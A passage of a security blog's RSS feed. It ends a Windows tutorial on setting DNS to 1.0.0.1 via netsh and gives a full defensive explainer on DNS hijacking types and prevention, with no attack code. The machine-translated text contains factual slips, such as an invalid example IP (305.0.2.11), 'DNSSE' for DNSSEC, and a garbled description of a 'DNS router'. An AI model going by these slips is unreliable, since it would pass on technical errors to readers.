<p><span style="color: #ff0000;"><strong>Eg:</strong> </span>I want to change the network card named <span style="color: #800080;"><strong>WIFI</strong></span>  with DNS is<strong><span style="color: #0000ff;">  1.0.0.1</span></strong>  of then I would use the following command:</p>
<pre class="lang:default decode:true">interface ip add dns name="Wi-Fi" addr="1.0.0.1" index=2</pre>
<p>After completing the DNS adjustment commands, we will come out like this:</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns6.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-9172" src="https://anonyviet.com/wp-content/uploads/2018/04/dns6.jpg" alt="dns" width="1105" height="638" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns6.jpg 1105w, https://anonyviet.com/wp-content/uploads/2018/04/dns6-300x173.jpg 300w, https://anonyviet.com/wp-content/uploads/2018/04/dns6-1024x591.jpg 1024w, https://anonyviet.com/wp-content/uploads/2018/04/dns6-768x443.jpg 768w, https://anonyviet.com/wp-content/uploads/2018/04/dns6-750x433.jpg 750w" sizes="auto, (max-width: 1105px) 100vw, 1105px" title="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing 19"/></a></p>
<p>To check if the DNS change is correct, press the command <span style="color: #0000ff;"><em><strong>exit</strong> </em></span>to escape <strong>netsh</strong>and type the command:</p>
<pre class="lang:default decode:true">ipconfig /all &#13;
</pre>
<p>Scroll down to the adjusted network card name above, and look at the DNS section.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns7.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-9173 size-full" src="https://anonyviet.com/wp-content/uploads/2018/04/dns7.jpg" alt="dns cloudflare" width="1102" height="633" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns7.jpg 1102w, https://anonyviet.com/wp-content/uploads/2018/04/dns7-300x172.jpg 300w, https://anonyviet.com/wp-content/uploads/2018/04/dns7-1024x588.jpg 1024w, https://anonyviet.com/wp-content/uploads/2018/04/dns7-768x441.jpg 768w, https://anonyviet.com/wp-content/uploads/2018/04/dns7-750x431.jpg 750w" sizes="auto, (max-width: 1102px) 100vw, 1102px" title="Instructions to adjust DNS to 1.1.1.1 speed up web surfing 20"/></a></p>
<p style="text-align: justify;">With the article <strong>Instructions to adjust DNS to 1.1.1.1 to speed up web surfing.</strong> AnonyViet wishes you to have more knowledge about DNS.  You can change DNS on Windows in two ways: using the interface and using the command.  With Cloudflare&#8217;s new free DNS service, you&#8217;ll get a significant speed boost when accessing the Internet.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;9159&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-to-adjust-dns-to-1-1-1-1-to-speed-up-web-surfing/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2018/04/dich-vu-1.1.1.1-650.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>What is DNS Hijacking and how to prevent it?</title>
		<link>https://en.anonyviet.com/what-is-dns-hijacking-and-how-to-prevent-it/</link>
					<comments>https://en.anonyviet.com/what-is-dns-hijacking-and-how-to-prevent-it/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 05:42:32 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Hijacking]]></category>
		<category><![CDATA[prevent]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=2609</guid>

					<description><![CDATA[The Domain Name System (DNS) is one of the essential components that make a Web site present on the Internet. Web applications and cloud services depend on it for high performance and online validity. A vulnerability in DNS (Hijacking DNS) can lead to loss of sensitive data, exploitation of web users, and website hijacking by [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>The Domain Name System (DNS) is one of the essential components that make a Web site present on the Internet.  Web applications and cloud services depend on it for high performance and online validity.  A vulnerability in DNS (Hijacking DNS) can lead to loss of sensitive data, exploitation of web users, and website hijacking by attackers.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="2609" fifu-featured="1" decoding="async" class="aligncenter wp-image-37778 size-full" src="https://anonyviet.com/wp-content/uploads/2021/12/computer-hacker.jpg" alt="What is DNS Hijacking and how to prevent it?" title="What is DNS Hijacking and how to prevent it?" width="563" height="281" srcset="https://anonyviet.com/wp-content/uploads/2021/12/computer-hacker.jpg 563w, https://anonyviet.com/wp-content/uploads/2021/12/computer-hacker-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/12/computer-hacker-360x180.jpg 360w" sizes="(max-width: 563px) 100vw, 563px" title="What is DNS Hijacking and How to Prevent it"/></p>
<p>Failure to monitor your domains for malicious activity is the basis for hackers to launch a series of attacks on your DNS.  In this article, we will discuss DNS intrusion in detail and how you can prevent it.</p>
<h2 id="ftoc-dns-hijacking-la-gi" class="ftwp-heading">What is DNS Hijacking?</h2>
<p><img decoding="async" loading="lazy" class="size-full wp-image-37779 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/12/cybercriminal-stealing-data.jpg" alt="What is DNS Hijacking and How to Prevent it" width="563" height="365" srcset="https://anonyviet.com/wp-content/uploads/2021/12/cybercriminal-stealing-data.jpg 563w, https://anonyviet.com/wp-content/uploads/2021/12/cybercriminal-stealing-data-300x194.jpg 300w" sizes="auto, (max-width: 563px) 100vw, 563px" title="What is DNS Hijacking and How to Prevent it"/></p>
<p>The Domain Name System (DNS) is a directory of domain names that are matched to their respective IP addresses.  It&#8217;s like a phone book, where you store someone&#8217;s number and name and simply enter the name to retrieve their number.</p>
<p>Web browsers and devices interact with the internet through Internet Protocol (IP) addresses with numbers like 305.0.2.11.  Domains like exmaple.com are created for websites.  Mistakenly avoiding users remembering complicated IP addresses, DNS will synchronize the domain name with the appropriate IP address to allow users to access online resources through the domain name while the browser can still continue to access the Internet. Continue to use a site-friendly IP address.</p>
<p>DNS hijacking, also known as DNS redirection (DNS redirection), is an activity where cybercriminals damage the resolving ability of domain name servers and redirect traffic to malicious domain name systems.  It is common in the absence of suitable security methods to protect your web application.</p>
<h2 id="ftoc-tai-sao-nhung-ke-tan-cong-lai-chiem-doat-dns" class="ftwp-heading">Why do attackers hijack DNS?</h2>
<p><img decoding="async" loading="lazy" class="size-full wp-image-37780 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/12/haking-mode.jpg" alt="What is DNS Hijacking and how to prevent it" width="563" height="375" srcset="https://anonyviet.com/wp-content/uploads/2021/12/haking-mode.jpg 563w, https://anonyviet.com/wp-content/uploads/2021/12/haking-mode-300x200.jpg 300w" sizes="auto, (max-width: 563px) 100vw, 563px" title="What is DNS Hijacking and how to prevent it"/></p>
<p>Attackers use DNS hijacking to do what we call Pharming.  Here, hackers display unnecessary ads just to generate revenue on views and clicks.  They also use it to redirect visitors to a cloned version of the current website and steal your data.</p>
<p>Interestingly, cybercriminals aren&#8217;t the only ones with DNS hijacking.  Some Internet Service Providers (ISPs) use this technique to throttle users&#8217; DNS requests to collect their data for business purposes.</p>
<p>Some resellers also perform a type of DNS hijacking to censor some content or redirect visitors to an alternative website.  This issue is controversial because it exposes users to attacks <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F10-website-giup-ban-thuc-hanh-ky-nang-hack-xss%2F" rel="noopener" class="local-link">XSS</a> on many websites.</p>
<h2 id="ftoc-tan-cong-dns-hijacking-hoat-dong-nhu-the-nao" class="ftwp-heading">How does DNS Hijacking attack work?</h2>
<p><img decoding="async" loading="lazy" class="size-full wp-image-37781 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/12/web-programmer.jpg" alt="What is DNS Hijacking and How to Prevent 10" width="563" height="375" srcset="https://anonyviet.com/wp-content/uploads/2021/12/web-programmer.jpg 563w, https://anonyviet.com/wp-content/uploads/2021/12/web-programmer-300x200.jpg 300w" sizes="auto, (max-width: 563px) 100vw, 563px" title="What is DNS Hijacking and How to Prevent it"/></p>
<p>To perform a DNS attack, an attacker would have to take control of a router (Router, Modem, Firewall, etc.), break into DNS communication, or install malware on a person&#8217;s computer system. use.</p>
<p>While you may not be the one managing your DNS, the third-party company that does it for you could be hacked without your knowledge.  If this happens, an attacker can hijack all your web traffic.</p>
<p>For example, let&#8217;s say you register your website with a domain registrar like example.com.  The registrar allows you to choose an available domain name.  The domain name sold to you will be registered with an IP address.</p>
<p>Your unique IP address is kept in DNS A records. A records point your domain name to your IP address.  Your domain registrar&#8217;s name servers can be hacked at any time, especially if that company&#8217;s security isn&#8217;t too high.  If the nameservers are compromised, attackers have the ability to change your unique IP address to another IP address.  When your domain is fetched from the DNS records, it points to the attacker&#8217;s own server instead of yours.</p>
<p>Also, when someone enters your domain name in their browser, it takes them to the attacker&#8217;s website.  When your visitors land on the attacker&#8217;s website, they will see a copy of your site.  But what they don&#8217;t know, it is under the control of hackers, who can steal their login credentials and access their accounts.</p>
<h2 id="ftoc-cac-loai-tan-cong-dns-hijacking" class="ftwp-heading">Types of DNS Hijacking Attacks</h2>
<p><img decoding="async" loading="lazy" class="size-full wp-image-37782 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/12/smartphone-security.jpg" alt="What is DNS Hijacking and How to Prevent it" width="563" height="375" srcset="https://anonyviet.com/wp-content/uploads/2021/12/smartphone-security.jpg 563w, https://anonyviet.com/wp-content/uploads/2021/12/smartphone-security-300x200.jpg 300w" sizes="auto, (max-width: 563px) 100vw, 563px" title="What is DNS Hijacking and how to prevent it 15"/></p>
<p>Internet users, web applications, and software all depend on DNS to function online.  Attackers know this.  So they look for security holes in DNS to launch attacks.</p>
<p>Cybercriminals use various techniques to gain unauthorized access to DNS.  Common forms of attack include:</p>
<h3 id="ftoc-1-hijacking-dns-cuc-bo" class="ftwp-heading">1. Local DNS Hijacking</h3>
<p>To perform a local DNS intrusion, an attacker installs malware on the user&#8217;s computer and changes the local DNS settings.  This will lead users to a fake website without their knowledge.</p>
<h3 id="ftoc-2-hijacking-dns-router" class="ftwp-heading">2. Hijacking DNS Router</h3>
<p>A DNS router is a hardware device used by domain name service providers to match people&#8217;s domains to their respective IP addresses.  Some routers struggle with firmware vulnerabilities and have weak default passwords.  These flaws leave the router vulnerable to a network attack, where hackers can take over the router and reconfigure DNS settings.</p>
<p>The attacker redirects the visitor to a malicious website and blocks the main website from accessing the main website after they are sure to have succeeded in overriding the website&#8217;s DNS router.</p>
<h3 id="ftoc-3-hijacking-dns-man-in-the-middle" class="ftwp-heading">3. DNS Hijacking man-in-the-middle</h3>
<p>In a man-in-the-middle attack, cybercriminals insert themselves into the communication channel between the user and the DNS server to eavesdrop or change information.</p>
<p>Attackers modify DNS settings, enter their IP addresses, and redirect users to their malware-filled website.</p>
<h3 id="ftoc-4-tan-cong-may-chu-dns" class="ftwp-heading">4. DNS Server Attack</h3>
<p>The attackers will attack the DNS servers and change the configuration of the targeted websites so that their IP addresses will be pointed to the malicious websites.  When a user sends a request to the target website, they are redirected to a phishing site where they are vulnerable.</p>
<h2 id="ftoc-cach-ngan-chan-dns-hijacking" class="ftwp-heading">How to prevent DNS Hijacking</h2>
<p><img decoding="async" loading="lazy" class="size-full wp-image-37783 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/12/cyberattacker-at-work.jpg" alt="What is DNS Hijacking and How to Prevent it" width="563" height="377" srcset="https://anonyviet.com/wp-content/uploads/2021/12/cyberattacker-at-work.jpg 563w, https://anonyviet.com/wp-content/uploads/2021/12/cyberattacker-at-work-300x201.jpg 300w" sizes="auto, (max-width: 563px) 100vw, 563px" title="What is DNS Hijacking and How to Prevent 16"/></p>
<p>As you work to increase traffic to your website, you must prioritize DNS security to ensure that any traffic counts.</p>
<p>Here are some ways to secure your web server from DNS attack.</p>
<h3 id="ftoc-1-kiem-tra-cai-dat-dns-cua-router" class="ftwp-heading">1. Check the Router&#8217;s DNS Settings</h3>
<p>Routers are very vulnerable and attackers will take advantage of this weakness to exploit victims.  To avoid danger, you need to verify and check your router&#8217;s DNS settings.  You should also update its password regularly.</p>
<h3 id="ftoc-2-trien-khai-registry-lock-trong-tai-khoan-mien-cua-ban" class="ftwp-heading">2. Implement Registry Lock in your domain account</h3>
<p>Another way to prevent DNS hijacking is to use a registry key (Registry Lock) to combat cyber threats.</p>
<p>Registry Lock is a service provided by the domain registrar to protect domain names from unauthorized updates, transfers, and deletions.  If your hosting provider doesn&#8217;t offer this service, you need to find one that offers it.</p>
<p>Make sure you enable two-factor authentication on your domain account as an extra layer of security.  Tighten security even further by launching the Domain Name System Security (DNSSE) extension in your website&#8217;s control panel.  It enhances DNS validation while preventing DNS redirects, man-in-the-middle attacks, and cache poisoning.</p>
<h3 id="ftoc-3-cai-dat-chuong-trinh-bao-ve-chong-phan-mem-doc-hai" class="ftwp-heading">3. Install an anti-malware program</h3>
<p>DNS intruders also target user credentials.  Make sure you install anti-virus software on your computer to detect any malicious attempts by cybercriminals to steal your credentials.  Use only secured virtual private networks to reduce the risk of your data being exposed.</p>
<p>To further secure your logins, create strong passwords and change them regularly.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;37777&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/what-is-dns-hijacking-and-how-to-prevent-it/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/12/computer-hacker.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
